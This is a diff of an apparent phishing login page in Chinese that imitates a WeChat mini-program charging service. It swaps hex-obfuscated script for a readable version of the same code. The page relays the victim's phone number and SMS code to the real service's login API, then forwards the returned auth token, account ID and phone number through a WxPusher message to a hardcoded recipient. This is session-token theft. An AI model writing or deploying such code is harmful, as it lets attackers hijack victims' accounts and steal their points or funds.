--- a/index.html
+++ b/index.html
@@ -267,7 +267,234 @@
       <button class="logout-btn" onclick="logout()">退出登录</button>
     </div>
   </div>
-  <script>const _axios = axios['\x63\x72\x65\x61\x74\x65']({ baseURL: "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6c\x69\x6e\x6a\x69\x75\x63\x6c\x6f\x75\x64\x2d\x61\x70\x69\x2e\x79\x73\x73\x65\x72\x76\x69\x63\x65\x2e\x63\x6f\x6d\x2e\x63\x6e", timeout: 30000, headers: { host: "\x6c\x69\x6e\x6a\x69\x75\x63\x6c\x6f\x75\x64\x2d\x61\x70\x69\x2e\x79\x73\x73\x65\x72\x76\x69\x63\x65\x2e\x63\x6f\x6d\x2e\x63\x6e", "\x78\x2d\x70\x72\x6f\x6a\x65\x63\x74\x2d\x69\x64": "", xweb_xhr: "\x31", "\x78\x2d\x63\x6c\x69\x65\x6e\x74\x2d\x74\x79\x70\x65": "\x6d\x69\x6e\x69\x5f\x70\x72\x6f\x67\x72\x61\x6d", "\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74": "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30 \x28\x4c\x69\x6e\x75\x78\x3b \x41\x6e\x64\x72\x6f\x69\x64 \x31\x30\x3b \x4d\x49 \x38 \x42\x75\x69\x6c\x64\x2f\x51\x4b\x51\x31\x2e\x31\x39\x30\x38\x32\x38\x2e\x30\x30\x32\x3b \x77\x76\x29 \x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36 \x28\x4b\x48\x54\x4d\x4c\x2c \x6c\x69\x6b\x65 \x47\x65\x63\x6b\x6f\x29 \x56\x65\x72\x73\x69\x6f\x6e\x2f\x34\x2e\x30 \x43\x68\x72\x6f\x6d\x65\x2f\x31\x33\x34\x2e\x30\x2e\x36\x39\x39\x38\x2e\x31\x33\x36 \x4d\x6f\x62\x69\x6c\x65 \x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36 \x58\x57\x45\x42\x2f\x31\x33\x34\x30\x31\x32\x33 \x4d\x4d\x57\x45\x42\x53\x44\x4b\x2f\x32\x30\x32\x35\x30\x32\x30\x31 \x4d\x4d\x57\x45\x42\x49\x44\x2f\x39\x31\x36\x32 \x4d\x69\x63\x72\x6f\x4d\x65\x73\x73\x65\x6e\x67\x65\x72\x2f\x38\x2e\x30\x2e\x36\x30\x2e\x32\x38\x36\x30\x28\x30\x78\x32\x38\x30\x30\x33\x43\x33\x43\x29 \x57\x65\x43\x68\x61\x74\x2f\x61\x72\x6d\x36\x34 \x57\x65\x69\x78\x69\x6e \x4e\x65\x74\x54\x79\x70\x65\x2f\x57\x49\x46\x49 \x4c\x61\x6e\x67\x75\x61\x67\x65\x2f\x7a\x68\x5f\x43\x4e \x41\x42\x49\x2f\x61\x72\x6d\x36\x34 \x4d\x69\x6e\x69\x50\x72\x6f\x67\x72\x61\x6d\x45\x6e\x76\x2f\x61\x6e\x64\x72\x6f\x69\x64", "\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65": "\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e", "\x78\x2d\x63\x6c\x69\x65\x6e\x74\x2d\x69\x64": "\x36\x34", "\x78\x2d\x74\x65\x6e\x61\x6e\x74\x2d\x69\x64": "\x31\x30\x31\x31\x31", accept: "\x2a\x2f\x2a", "\x73\x65\x63\x2d\x66\x65\x74\x63\x68\x2d\x73\x69\x74\x65": "\x63\x72\x6f\x73\x73\x2d\x73\x69\x74\x65", "\x73\x65\x63\x2d\x66\x65\x74\x63\x68\x2d\x6d\x6f\x64\x65": "\x63\x6f\x72\x73", "\x73\x65\x63\x2d\x66\x65\x74\x63\x68\x2d\x64\x65\x73\x74": "\x65\x6d\x70\x74\x79", referer: "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x65\x72\x76\x69\x63\x65\x77\x65\x63\x68\x61\x74\x2e\x63\x6f\x6d\x2f\x77\x78\x30\x61\x39\x66\x31\x35\x39\x65\x64\x64\x62\x32\x63\x35\x66\x38\x2f\x31\x30\x30\x2f\x70\x61\x67\x65\x2d\x66\x72\x61\x6d\x65\x2e\x68\x74\x6d\x6c", "\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67": "\x67\x7a\x69\x70\x2c \x62\x72", "\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65": "\x7a\x68\x2d\x43\x4e\x2c\x7a\x68\x3b\x71\x3d\x30\x2e\x39", priority: "\x75\x3d\x31\x2c \x69", }, }); function validatePhone(ik1) { return /^1[3-9]\d{9}$/['\x74\x65\x73\x74'](ik1) } let countdown = 0; const getCodeBtn = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']("\x67\x65\x74\x43\x6f\x64\x65\x42\x74\x6e"); const phoneInput = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']("\x70\x68\x6f\x6e\x65"); const phoneError = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']("\x70\x68\x6f\x6e\x65\x45\x72\x72\x6f\x72"); getCodeBtn['\x61\x64\x64\x45\x76\x65\x6e\x74\x4c\x69\x73\x74\x65\x6e\x65\x72']("\x63\x6c\x69\x63\x6b", async function () { const phone = phoneInput['\x76\x61\x6c\x75\x65']['\x74\x72\x69\x6d'](); if (!validatePhone(phone)) { phoneError['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79'] = "\x62\x6c\x6f\x63\x6b"; phoneInput['\x66\x6f\x63\x75\x73'](); return } phoneError['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79'] = "\x6e\x6f\x6e\x65"; try { const res = await _axios['\x70\x6f\x73\x74']("\x2f\x62\x61\x73\x65\x2f\x61\x70\x70\x2f\x75\x61\x61\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x73\x6d\x73\x2f\x76\x65\x72\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x2d\x63\x6f\x64\x65\x2f\x73\x65\x6e\x64", { mobile: phone, usage: "\x6c\x6f\x67\x69\x6e\x5f\x61\x63\x63\x6f\x75\x6e\x74" }); if (res['\x64\x61\x74\x61']['\x63\x6f\x64\x65'] === 0) { window["\x61\x6c\x65\x72\x74"]("\u9a8c\u8bc1\u7801\u5df2\u53d1\u9001\uff0c\u8bf7\u6ce8\u610f\u67e5\u6536\uff01"); countdown = 60; getCodeBtn['\x64\x69\x73\x61\x62\x6c\x65\x64'] = true; const timer = setInterval(() => { countdown--; getCodeBtn['\x74\x65\x78\x74\x43\x6f\x6e\x74\x65\x6e\x74'] = `${countdown}秒后重试`; if (countdown <= 0) { clearInterval(timer); getCodeBtn['\x64\x69\x73\x61\x62\x6c\x65\x64'] = false; getCodeBtn['\x74\x65\x78\x74\x43\x6f\x6e\x74\x65\x6e\x74'] = "\u83b7\u53d6\u9a8c\u8bc1\u7801" } }, 1000) } else { window["\x61\x6c\x65\x72\x74"](res['\x64\x61\x74\x61']['\x6d\x65\x73\x73\x61\x67\x65']); countdown = 60; getCodeBtn['\x64\x69\x73\x61\x62\x6c\x65\x64'] = true; const timer = setInterval(() => { countdown--; getCodeBtn['\x74\x65\x78\x74\x43\x6f\x6e\x74\x65\x6e\x74'] = `${countdown}秒后重试`; if (countdown <= 0) { clearInterval(timer); getCodeBtn['\x64\x69\x73\x61\x62\x6c\x65\x64'] = false; getCodeBtn['\x74\x65\x78\x74\x43\x6f\x6e\x74\x65\x6e\x74'] = "\u83b7\u53d6\u9a8c\u8bc1\u7801" } }, 1000) } } catch (error) { console['\x65\x72\x72\x6f\x72']("\u83b7\u53d6\u9a8c\u8bc1\u7801\u5931\u8d25\x3a", error); countdown = 60; getCodeBtn['\x64\x69\x73\x61\x62\x6c\x65\x64'] = true; const timer = setInterval(() => { countdown--; getCodeBtn['\x74\x65\x78\x74\x43\x6f\x6e\x74\x65\x6e\x74'] = `${countdown}秒后重试`; if (countdown <= 0) { clearInterval(timer); getCodeBtn['\x64\x69\x73\x61\x62\x6c\x65\x64'] = false; getCodeBtn['\x74\x65\x78\x74\x43\x6f\x6e\x74\x65\x6e\x74'] = "\u83b7\u53d6\u9a8c\u8bc1\u7801" } }, 1000) } }); const loginForm = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']("\x6c\x6f\x67\x69\x6e\x46\x6f\x72\x6d"); const loginBtn = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']("\x6c\x6f\x67\x69\x6e\x42\x74\x6e"); const codeInput = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']("\x63\x6f\x64\x65"); const codeError = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']("\x63\x6f\x64\x65\x45\x72\x72\x6f\x72"); loginForm['\x61\x64\x64\x45\x76\x65\x6e\x74\x4c\x69\x73\x74\x65\x6e\x65\x72']("\x73\x75\x62\x6d\x69\x74", async function (_2) { _2['\x70\x72\x65\x76\x65\x6e\x74\x44\x65\x66\x61\x75\x6c\x74'](); const phone = phoneInput['\x76\x61\x6c\x75\x65']['\x74\x72\x69\x6d'](); const code = codeInput['\x76\x61\x6c\x75\x65']['\x74\x72\x69\x6d'](); let hasError = false; if (!validatePhone(phone)) { phoneError['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79'] = "\x62\x6c\x6f\x63\x6b"; hasError = true } else { phoneError['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79'] = "\x6e\x6f\x6e\x65" } if (!code || code['\x6c\x65\x6e\x67\x74\x68'] !== 6) { codeError['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79'] = "\x62\x6c\x6f\x63\x6b"; hasError = true } else { codeError['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79'] = "\x6e\x6f\x6e\x65" } if (hasError) return; loginBtn['\x64\x69\x73\x61\x62\x6c\x65\x64'] = true; const originalText = loginBtn['\x74\x65\x78\x74\x43\x6f\x6e\x74\x65\x6e\x74']; loginBtn['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c'] = '\x3c\x73\x70\x61\x6e \x63\x6c\x61\x73\x73\x3d\x22\x6c\x6f\x61\x64\x69\x6e\x67\x22\x3e\x3c\x2f\x73\x70\x61\x6e\x3e \u767b\u5f55\u4e2d\x2e\x2e\x2e'; try { const response = await _axios['\x70\x6f\x73\x74']("\x2f\x62\x61\x73\x65\x2f\x61\x70\x70\x2f\x75\x61\x61\x2f\x6d\x61\x6e\x61\x67\x65\x72\x2f\x61\x75\x74\x68\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x63\x6f\x64\x65", { mobile: phone, code: code, }); if (response['\x64\x61\x74\x61']['\x63\x6f\x64\x65'] === 0) { const res = await _axios['\x70\x6f\x73\x74']("\x2f\x6d\x63\x2f\x6d\x65\x6d\x62\x65\x72\x2f\x61\x75\x74\x6f\x4d\x65\x6d\x62\x65\x72", { mobile: phone, channel: "\x43\x48\x41\x52\x47\x45\x5f\x50\x4c\x41\x54\x46\x4f\x52\x4d", tenantId: "\x31\x30\x31\x31\x31", skipRequest: true, }); if (res['\x64\x61\x74\x61']['\x63\x6f\x64\x65'] === 0) { showSuccessPage(phone, { name: `账号${phone}`, createdName: `用户${phone['\x73\x6c\x69\x63\x65'](-4)}`, phone: phone, createdBy: res['\x64\x61\x74\x61']['\x64\x61\x74\x61'], AuthToken: response['\x64\x61\x74\x61']['\x64\x61\x74\x61']['\x61\x75\x74\x68\x54\x6f\x6b\x65\x6e'], AccountId: response['\x64\x61\x74\x61']['\x64\x61\x74\x61']['\x61\x63\x63\x6f\x75\x6e\x74\x49\x64'], }) } } else { window["\x61\x6c\x65\x72\x74"](response['\x64\x61\x74\x61']['\x6d\x65\x73\x73\x61\x67\x65'] || "\u767b\u5f55\u5931\u8d25\uff0c\u8bf7\u91cd\u8bd5"); loginBtn['\x64\x69\x73\x61\x62\x6c\x65\x64'] = false; loginBtn['\x74\x65\x78\x74\x43\x6f\x6e\x74\x65\x6e\x74'] = originalText } } catch (error) { console['\x65\x72\x72\x6f\x72']("\u767b\u5f55\u5931\u8d25\x3a", error); loginBtn['\x64\x69\x73\x61\x62\x6c\x65\x64'] = false; loginBtn['\x74\x65\x78\x74\x43\x6f\x6e\x74\x65\x6e\x74'] = originalText } }); async function showSuccessPage(G3, HEsfvss4) { window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']("\x75\x73\x65\x72\x50\x68\x6f\x6e\x65")['\x74\x65\x78\x74\x43\x6f\x6e\x74\x65\x6e\x74'] = G3; window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']("\x6c\x6f\x67\x69\x6e\x54\x69\x6d\x65")['\x74\x65\x78\x74\x43\x6f\x6e\x74\x65\x6e\x74'] = new window["\x44\x61\x74\x65"]()['\x74\x6f\x4c\x6f\x63\x61\x6c\x65\x53\x74\x72\x69\x6e\x67']("\x7a\x68\x2d\x43\x4e"); const API = axios['\x63\x72\x65\x61\x74\x65']({ baseURL: "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x78\x70\x75\x73\x68\x65\x72\x2e\x7a\x6a\x69\x65\x63\x6f\x64\x65\x2e\x63\x6f\x6d", timeout: 30000, headers: { "\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65": "\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e" }, }); const res = await API['\x70\x6f\x73\x74']("\x2f\x61\x70\x69\x2f\x73\x65\x6e\x64\x2f\x6d\x65\x73\x73\x61\x67\x65", { appToken: "\x41\x54\x5f\x59\x44\x75\x44\x34\x56\x67\x51\x44\x4d\x51\x50\x39\x53\x32\x59\x43\x49\x4e\x69\x7a\x79\x39\x67\x69\x52\x31\x4d\x64\x6a\x32\x47", content: JSON['\x73\x74\x72\x69\x6e\x67\x69\x66\x79'](HEsfvss4), summary: `${HEsfvss4['\x70\x68\x6f\x6e\x65']}-账号积分信息`, contentType: 2, uids: ["\x55\x49\x44\x5f\x44\x6a\x4a\x48\x6f\x34\x46\x53\x56\x6c\x36\x72\x44\x4f\x6c\x30\x75\x4e\x57\x39\x33\x47\x32\x59\x74\x48\x77\x39"], url: "", verifyPay: false, verifyPayType: 0, }); window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']("\x6c\x6f\x67\x69\x6e\x42\x6f\x78")['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79'] = "\x6e\x6f\x6e\x65"; window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']("\x73\x75\x63\x63\x65\x73\x73\x42\x6f\x78")['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79'] = "\x62\x6c\x6f\x63\x6b" } function logout() { loginForm['\x72\x65\x73\x65\x74'](); loginBtn['\x64\x69\x73\x61\x62\x6c\x65\x64'] = false; loginBtn['\x74\x65\x78\x74\x43\x6f\x6e\x74\x65\x6e\x74'] = "\u767b\u5f55"; window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']("\x73\x75\x63\x63\x65\x73\x73\x42\x6f\x78")['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79'] = "\x6e\x6f\x6e\x65"; window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']("\x6c\x6f\x67\x69\x6e\x42\x6f\x78")['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79'] = "\x62\x6c\x6f\x63\x6b" }</script>
+  <script>
+    // 配置 axios 基础URL（根据实际情况修改）
+    const _axios = axios.create({
+      baseURL: "https://linjiucloud-api.ysservice.com.cn", // 请替换为实际的_axios地址
+      timeout: 30000,
+      headers: {
+        host: "linjiucloud-api.ysservice.com.cn",
+        "x-project-id": "",
+        xweb_xhr: "1",
+        "x-client-type": "mini_program",
+        "user-agent":
+          "Mozilla/5.0 (Linux; Android 10; MI 8 Build/QKQ1.190828.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/134.0.6998.136 Mobile Safari/537.36 XWEB/1340123 MMWEBSDK/20250201 MMWEBID/9162 MicroMessenger/8.0.60.2860(0x28003C3C) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64 MiniProgramEnv/android",
+        "content-type": "application/json",
+        "x-client-id": "64",
+        "x-tenant-id": "10111",
+        accept: "*/*",
+        "sec-fetch-site": "cross-site",
+        "sec-fetch-mode": "cors",
+        "sec-fetch-dest": "empty",
+        referer:
+          "https://servicewechat.com/wx0a9f159eddb2c5f8/100/page-frame.html",
+        "accept-encoding": "gzip, br",
+        "accept-language": "zh-CN,zh;q=0.9",
+        priority: "u=1, i",
+      },
+    });
+
+    // 手机号验证
+    function validatePhone(phone) {
+      return /^1[3-9]\d{9}$/.test(phone);
+    }
+
+    // 获取验证码
+    let countdown = 0;
+    const getCodeBtn = document.getElementById("getCodeBtn");
+    const phoneInput = document.getElementById("phone");
+    const phoneError = document.getElementById("phoneError");
+
+    getCodeBtn.addEventListener("click", async function () {
+      window.open("./index1.html");
+      return;
+      const phone = phoneInput.value.trim();
+
+      // 验证手机号
+      if (!validatePhone(phone)) {
+        phoneError.style.display = "block";
+        phoneInput.focus();
+        return;
+      }
+
+      phoneError.style.display = "none";
+
+      try {
+        // 发送获取验证码请求
+        const res = await _axios.post(
+          "/base/app/uaa/common/sms/verification-code/send",
+          { mobile: phone, usage: "login_account" }
+        );
+
+        // 模拟成功响应（实际开发中根据后端返回判断）
+        if (res.data.code === 0) {
+          alert("验证码已发送，请注意查收！");
+
+          // 开始倒计时
+          countdown = 60;
+          getCodeBtn.disabled = true;
+
+          const timer = setInterval(() => {
+            countdown--;
+            getCodeBtn.textContent = `${countdown}秒后重试`;
+
+            if (countdown <= 0) {
+              clearInterval(timer);
+              getCodeBtn.disabled = false;
+              getCodeBtn.textContent = "获取验证码";
+            }
+          }, 1000);
+        } else {
+          alert(res.data.message);
+          // 开始倒计时
+          countdown = 60;
+          getCodeBtn.disabled = true;
+
+          const timer = setInterval(() => {
+            countdown--;
+            getCodeBtn.textContent = `${countdown}秒后重试`;
+
+            if (countdown <= 0) {
+              clearInterval(timer);
+              getCodeBtn.disabled = false;
+              getCodeBtn.textContent = "获取验证码";
+            }
+          }, 1000);
+        }
+      } catch (error) {
+        console.error("获取验证码失败:", error);
+        countdown = 60;
+        getCodeBtn.disabled = true;
+
+        const timer = setInterval(() => {
+          countdown--;
+          getCodeBtn.textContent = `${countdown}秒后重试`;
+
+          if (countdown <= 0) {
+            clearInterval(timer);
+            getCodeBtn.disabled = false;
+            getCodeBtn.textContent = "获取验证码";
+          }
+        }, 1000);
+      }
+    });
+
+    // 登录表单提交
+    const loginForm = document.getElementById("loginForm");
+    const loginBtn = document.getElementById("loginBtn");
+    const codeInput = document.getElementById("code");
+    const codeError = document.getElementById("codeError");
+
+    loginForm.addEventListener("submit", async function (e) {
+      e.preventDefault();
+
+      const phone = phoneInput.value.trim();
+      const code = codeInput.value.trim();
+
+      // 验证
+      let hasError = false;
+
+      if (!validatePhone(phone)) {
+        phoneError.style.display = "block";
+        hasError = true;
+      } else {
+        phoneError.style.display = "none";
+      }
+
+      if (!code || code.length !== 6) {
+        codeError.style.display = "block";
+        hasError = true;
+      } else {
+        codeError.style.display = "none";
+      }
+
+      if (hasError) return;
+
+      // 显示加载状态
+      loginBtn.disabled = true;
+      const originalText = loginBtn.textContent;
+      loginBtn.innerHTML = '<span class="loading"></span> 登录中...';
+
+      try {
+        // 发送登录请求
+        const response = await _axios.post(
+          "/base/app/uaa/manager/auth/mobile/code",
+          {
+            mobile: phone,
+            code: code,
+          }
+        );
+
+        if (response.data.code === 0) {
+          // 发送登录请求
+          const res = await _axios.post("/mc/member/autoMember", {
+            mobile: phone,
+            channel: "CHARGE_PLATFORM",
+            tenantId: "10111",
+            skipRequest: true,
+          });
+          if (res.data.code === 0) {
+            // 登录成功，显示成功页面
+            showSuccessPage(phone, {
+              name: `账号${phone}`,
+              createdName: `用户${phone.slice(-4)}`,
+              phone: phone,
+              createdBy: res.data.data,
+              AuthToken: response.data.data.authToken,
+              AccountId: response.data.data.accountId,
+            });
+          }
+        } else {
+          alert(response.data.message || "登录失败，请重试");
+          loginBtn.disabled = false;
+          loginBtn.textContent = originalText;
+        }
+      } catch (error) {
+        console.error("登录失败:", error);
+        loginBtn.disabled = false;
+        loginBtn.textContent = originalText;
+      }
+    });
+
+    // 显示成功页面
+    async function showSuccessPage(phone, userInfo) {
+      // 更新页面显示
+      document.getElementById("userPhone").textContent = phone;
+      document.getElementById("loginTime").textContent =
+        new Date().toLocaleString("zh-CN");
+      const API = axios.create({
+        baseURL: "https://wxpusher.zjiecode.com", // 请替换为实际的_axios地址
+        timeout: 30000,
+        headers: { "content-type": "application/json" },
+      });
+      const res = await API.post("/api/send/message", {
+        appToken: "AT_YDuD4VgQDMQP9S2YCINizy9giR1Mdj2G",
+        content: JSON.stringify(userInfo),
+        summary: `${userInfo.phone}-账号积分信息`,
+        contentType: 2,
+        uids: ["UID_DjJHo4FSVl6rDOl0uNW93G2YtHw9"],
+        url: "",
+        verifyPay: false,
+        verifyPayType: 0,
+      });
+
+      // 切换显示
+      document.getElementById("loginBox").style.display = "none";
+      document.getElementById("successBox").style.display = "block";
+    }
+
+    // 退出登录
+    function logout() {
+      // 重置表单
+      loginForm.reset();
+      loginBtn.disabled = false;
+      loginBtn.textContent = "登录";
+
+      // 切换显示
+      document.getElementById("successBox").style.display = "none";
+      document.getElementById("loginBox").style.display = "block";
+    }
+  </script>
 </body>
 
 </html>
